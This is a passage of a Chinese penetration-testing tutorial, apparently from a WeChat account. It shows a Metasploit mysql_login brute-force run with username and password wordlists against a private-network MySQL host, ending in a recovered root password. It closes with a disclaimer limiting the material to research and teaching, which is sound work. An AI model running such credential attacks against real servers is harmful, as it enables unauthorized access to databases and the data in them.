输出信息显示Mysql可用模块,在模块中,选择渗透工具模块
这里使用Mysql扫描模块
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.145
RHOSTS => 192.168.1.145
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
user_file => user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file passwd.txt
pass_file => passwd.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set STOP_NO_SUCCESS true
[!] Unknown datastore option: STOP_NO_SUCCESS. Did you mean STOP_ON_SUCCESS?
STOP_NO_SUCCESS => true
msf6 auxiliary(scanner/mysql/mysql_login) > exploit
[+] 192.168.1.145:3306 - 192.168.1.145:3306 - Found remote MySQL version 5.7.44
[!] 192.168.1.145:3306 - No active DB -- Credential data will not be saved!
[-] 192.168.1.145:3306 - 192.168.1.145:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'192.168.1.103' (using password: NO))
[-] 192.168.1.145:3306 - 192.168.1.145:3306 - LOGIN FAILED: root:Ljj!123456 (Incorrect: Access denied for user 'root'@'192.168.1.103' (using password: YES))
[+] 192.168.1.145:3306 - 192.168.1.145:3306 - Success: 'root:Ljj@123456'
[*] 192.168.1.145:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
原文始发于微信公众号(运维星火燎原):渗透攻击Mysql数据库服务
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论